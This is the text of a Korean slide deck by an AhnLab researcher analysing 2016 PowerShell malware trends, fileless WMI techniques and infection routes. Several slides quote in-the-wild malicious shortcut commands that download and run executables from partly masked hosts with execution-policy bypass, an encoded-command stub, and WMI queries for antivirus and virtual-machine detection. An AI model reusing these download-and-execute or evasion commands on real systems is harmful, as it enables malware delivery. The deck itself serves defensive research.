More Related Content
Similar to Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판 (20)
More from Minseok(Jacky) Cha (16)
Power shell 악성코드 동향 20161118_차민석_디지털 포렌식 기술특강 공개판
- 2. © AhnLab, Inc. All rights reserved. 2
:~$whoami
Profile
− 차민석 (車珉錫, CHA Minseok, Jacky Cha, mstoned7)
− 1988년 1월 7일 : Apple ][+ 복제품으로 컴퓨터 시작
− 1989년 : Brain virus 변형 감염
− 1997년 : AhnLab 입사
− AhnLab 책임 연구원 (Senior Malware Researcher)
− 시큐리티 대응센터(ASEC) 분석팀에서
악성코드 분석 및 연구 중
- 민간합동 조사단, 사이버보안 전문단
- vforum, AVED, AMTSO 멤버
- Wildlist Reporter
- 3. © AhnLab, Inc. All rights reserved. 3
:~$whoami
• 책
-보안에미쳐라(2016)
* Source:http://www.yes24.com/24/goods/29333992
- 4. © AhnLab, Inc. All rights reserved. 4
시작하기 전에
• 보안이 완벽한 시스템은 이 세상에 없어
- MatthewBroderick주연위험한게임(WarGames)
* Source:WarGames(1983)
- 5. © AhnLab, Inc. All rights reserved. 5
Wrap up
• PowerShell를 이용한 악성코드 증가
- Windows7와Windows10점유율에따름
-보통RansomwareDownloader로이용
-TargetedAttack에도이용시작포착
• WMI 이용
-Fileless악성코드제작가능
• 전망
-JS,VBS와함께PowerShell악성코드증가예상
-Multi-Platform악성코드가능성
- 8. © AhnLab, Inc. All rights reserved. 8
PowerShell
• PowerShell
- 2006년공개된ScriptLanguage
-WindowsVista이후기본탑재
* Source:https://msdn.microsoft.com/en-us/powershell
- 9. © AhnLab, Inc. All rights reserved. 9
Windows Management Instrumentation (WMI)
• WMI
-
* Source:https://msdn.microsoft.com/en-us/library/aa394582(v=vs.85).aspx
- 10. © AhnLab, Inc. All rights reserved. 10
Windows Management Instrumentation (WMI)
• WMIArchitecture
-
* Source:http://oversitesentry.com/blackhat-presentation-wmi-architecture-used-to-attack/
- 11. © AhnLab, Inc. All rights reserved. 11
PowerShell + WMI
• AntiVirus제품 정보 얻기
- get-wmiobject -Namespace rootSecurityCenter2 -Class AntiVirusProduct
- 12. © AhnLab, Inc. All rights reserved. 12
PowerShell + WMI
• 가상환경 검사
- Get-WmiObject –Class Win32_ComputerSystem
- 14. © AhnLab, Inc. All rights reserved.
Timeline
Monad
발표
1993 1998 2000 2004 2006 2007 2013 2014 2015
Poweliks
2016
PowerShell
공개
PowerShell
+ Macro
등장
VB
Script
악성코드
PowerShell
Downloader
범람
PowerShell
악성코드
POC
Macro
virus
2017
Loveletter PowerShell
Ransomware
Kovter
향상된
Batch
virus
BedepPhase
WMI
이용한
Fileless
침해사고
- 15. © AhnLab, Inc. All rights reserved. 15
1995 – Macro virus
• 1995년 – 2001년: Macro virus전성기
-
* Source:
- 16. © AhnLab, Inc. All rights reserved. 16
2000 - Loveletter
• 2000년 5월 4일 LoveLettervirus
- email로전파
-Iloveyou라는메일제목의사회공학기법사용
-그림,음악파일파괴
- 17. © AhnLab, Inc. All rights reserved. 17
2004 – Monad
• 우려
- 2004년Monad개발
* Source:https://www.virusbulletin.com/conference/vb2004/abstracts/return-script-viruses
- 18. © AhnLab, Inc. All rights reserved. 18
2006 - PowerShell 악성코드 POC
• PowerShellPOC 악성코드
-
* Source:https://www.symantec.com/security_response/writeup.jsp?docid=2006-080216-3625-99&tabid=2
- 19. © AhnLab, Inc. All rights reserved. 19
2006 - PowerShell Released
• PowerShellReleased
-
* Source:http://www.symantec.com/connect/ru/blogs/powershell-released?page=1
- 20. © AhnLab, Inc. All rights reserved. 20
2013 – PowerShell Ransomware
• PowerShellRansomware등장
-
* Source:https://nakedsecurity.sophos.com/2013/03/05/russian-ransomware-windows-powershell/
- 21. © AhnLab, Inc. All rights reserved. 21
2014 - Poweliks
• Poweliks
-Registry내저장
* Source:http://blog.trendmicro.com/trendlabs-security-intelligence/poweliks-malware-hides-in-windows-registry/
- 22. © AhnLab, Inc. All rights reserved. 22
2014 - Phase
• Phase
-2013년발견된Solarbot변형
* Source:http://blog.trendmicro.com/trendlabs-security-intelligence/without-a-trace-fileless-malware-spotted-in-the-wild/
- 23. © AhnLab, Inc. All rights reserved. 23
2015 – WMI 악용
• Black Hat2015
-
* Source:https://www.blackhat.com/docs/us-15/materials/us-15-Graeber-Abusing-Windows-Management-Instrumentation-WMI-To-Build-A-
Persistent%20Asynchronous-And-Fileless-Backdoor-wp.pdf
- 24. © AhnLab, Inc. All rights reserved. 24
2015 - PowerShell 악성코드 증가 시작
• PowerShell악성코드 증가
-
* Source:https://securelist.com/blog/research/72417/the-rise-of-net-and-powershell-malware/
- 25. © AhnLab, Inc. All rights reserved. 25
2016 - Macro + PowerShell
• Macro + PowerShell
-
* Source:http://researchcenter.paloaltonetworks.com/2016/03/powersniff-malware-used-in-macro-based-attacks/
- 26. © AhnLab, Inc. All rights reserved. 26
2016 - PowerShell 이용한 악성코드 유행
• PowerShell이용한 악성코드 유행
-
* Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
- 28. © AhnLab, Inc. All rights reserved.
In-the-Wild 악성코드 조건
조건
많은
사용자
보안
체계 허점
손쉬운
제작
- 29. © AhnLab, Inc. All rights reserved.
PowerShell 악성코드 장점
장점
강력한
기능
손쉬운
제작
행위 기반 제품
우회 가능성
- 30. © AhnLab, Inc. All rights reserved. 30
주요 감염 경로
• 주요 감염 경로
Mail
− 첨부 파일 혹은 Link
icon
Web Browser
− Exploit Kit 이용
− Fileless 악성코드 감염에도 이용
- 32. © AhnLab, Inc. All rights reserved. 32
PowerShell 실행
• 실행 권한
- DownloadFile명령의개별명령과스크립트실행테스트
-개별명령은실행되지만스크립트는정책상실행되지않음
- 33. © AhnLab, Inc. All rights reserved. 33
PowerShell 실행
• Bypass PowerShell executionpolicies
-
* Source:https://technet.microsoft.com/en-us/library/ee176847.aspx
- 34. © AhnLab, Inc. All rights reserved. 34
PowerShell 실행
• Bypass PowerShell executionpolicies
-
* Source:http://www.darkoperator.com/blog/2013/3/5/powershell-basics-execution-policy-part-1.html
- 35. © AhnLab, Inc. All rights reserved. 35
기능
• Downloader혹은 Dropper
-
* Source:https://blogs.mcafee.com/mcafee-labs/malware-employs-powershell-to-infect-systems/
- 37. © AhnLab, Inc. All rights reserved.
종류
종류
Office
(DOC, DOCM,
XLS, XLSM)
Shortcut
(LNK)
PowerShell
(PS1)
Windows
ScriptFile
(WSF), HTML
Application
(HTA)
Java Script
/Visual Basic
Script
(JS, JSE,
VBS, VBE,
WSF, HTA)
- 38. © AhnLab, Inc. All rights reserved. 38
Java Script - JS
• JavaScript(JS)
-
- 39. © AhnLab, Inc. All rights reserved. 39
Visual Basic Script
• VisualBasicScript(VBS)
-
- 40. © AhnLab, Inc. All rights reserved. 40
Windows Script File (WSF)
• WSF(WindowsScriptFile)
- 대부분JavaScript
- 41. © AhnLab, Inc. All rights reserved. 41
Windows Script File (WSF)
• WSF(WindowsScriptFile)
-
- 42. © AhnLab, Inc. All rights reserved. 42
HTMLApplication (HTA)
• HTMLApplication(HTA)
-대부분JavaScript
- 43. © AhnLab, Inc. All rights reserved. 43
Office (DOC, DOCM, XLS, XLSM)
• Macro 포함 문서
-
- 45. © AhnLab, Inc. All rights reserved. 45
Shortcut (LNK)
• Download
- %WINDIR%System32WindowsPowerShellv1.0powershell.exe $cmd = 'Start-Process';$b = '%TEMP%tes'+'t3.e'+'xe'; $a = New-Object
System.Net.WebClient; $a.DownloadFile('http://*****ennox.com/wp-includes/putty.exe','%TEMP%tes'+'t3.e'+'xe'); &($cmd) -FilePath
$b;
- 46. © AhnLab, Inc. All rights reserved. 46
Shortcut (LNK)
• Download
- C:WindowsSystem32WindowsPowerShellv1.0powershell.exe -ExecutionPolicy bypass -noprofile -windowstyle hidden (New-Object
System.Net.WebClient).DownloadFile('http://dire****.com/2D2A/bg.exe','%APPDATA%Example.exe'); cmd /c '%APPDATA%Example.exe'
- 47. © AhnLab, Inc. All rights reserved. 47
Shortcut (LNK)
• Encoding
- C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe powershell.exe -EncodedCommand UABvAHc………
- 48. © AhnLab, Inc. All rights reserved. 48
PowerShell (PS1)
• PowerShell
-
- 50. © AhnLab, Inc. All rights reserved. 50
Fileless
• FilelessTechnique으로이용
-Poweliks
* Source:https://blog.gdatasoftware.com/2014/07/23947-poweliks-the-persistent-malware-without-a-file
- 51. © AhnLab, Inc. All rights reserved. 51
Fileless
• FilelessTechnique으로이용
-Poweliks
- 52. © AhnLab, Inc. All rights reserved. 52
Fileless 악성코드
• Kovter
- Run항목읽을수없음
- 53. © AhnLab, Inc. All rights reserved. 53
Fileless 악성코드
• Kovter
-mshta.exe를통해Script실행
- 54. © AhnLab, Inc. All rights reserved. 54
Fileless 악성코드
• Kovter
-인코딩된데이터
- 57. © AhnLab, Inc. All rights reserved. 57
Error
• WindowsPowerShell작동 중지
- 갑자기WindowsPowerShell에러가발생할수있음
- 58. © AhnLab, Inc. All rights reserved. 58
Response
• WMI for Detectionand Response
-
* Source:https://ics-cert.us-cert.gov/sites/default/files/documents/WMI_for_Detection_and_Response_S508C.pdf
- 59. © AhnLab, Inc. All rights reserved. 59
전망
• PowerShell의확장
-
* Source:https://blogs.msdn.microsoft.com/powershell/2016/08/18/powershell-on-linux-and-open-source-2
- 60. © AhnLab, Inc. All rights reserved.
전망
전망
JS, VBS
대체 ?!
Obfuscation Cross-Platform
- 61. © AhnLab, Inc. All rights reserved. 61
Wrap up
• PowerShell를 이용한 악성코드 증가
- Windows7와Windows10점유율에따름
-보통RansomwareDownloader로이용
-TargetedAttack에도이용시작포착
• WMI 이용
-Fileless악성코드제작가능
• 전망
-JS,VBS와함께PowerShell악성코드증가예상
-Multi-Platform악성코드가능성
- 62. © AhnLab, Inc. All rights reserved. 62
현재의 보안 문제
• Not reallya fair fight
* source:http://image-store.slidesharecdn.com/81268b95-5c3b-4604-9129-d83ab3dc4600-large.png
- 63. © AhnLab, Inc. All rights reserved. 63
현재의 보안 문제
• 모두가 함께 해야 하는 보안
* source:http://www.security-marathon.be/?p=1786
- 64. © AhnLab, Inc. All rights reserved. 64
Q&A
email : minseok.cha@ahnlab.com / mstoned7@gmail.com
http://xcoolcat7.tistory.com
https://twitter.com/xcoolcat7, https://twitter.com/mstoned7
- 65. © AhnLab, Inc. All rights reserved. 65
Reference
• Ryan Kazanciyan& Matt Hastings,‘InvestigatingPowerShellAttack’,2014
• Matt Graeber, ‘Abusing WindowsManagementInstrumentation(WMI) to Builda Persistent,
Asyncronous,andFilelessBackdoor’,2015
• Santiago M.Pontiroli &F. Roberto Martinez, ‘TheTao of .NETand PowerShellMalwareAnalysis’,2015
• 김승훈/AhnLab,‘매크로 다운로더 분석’, 2016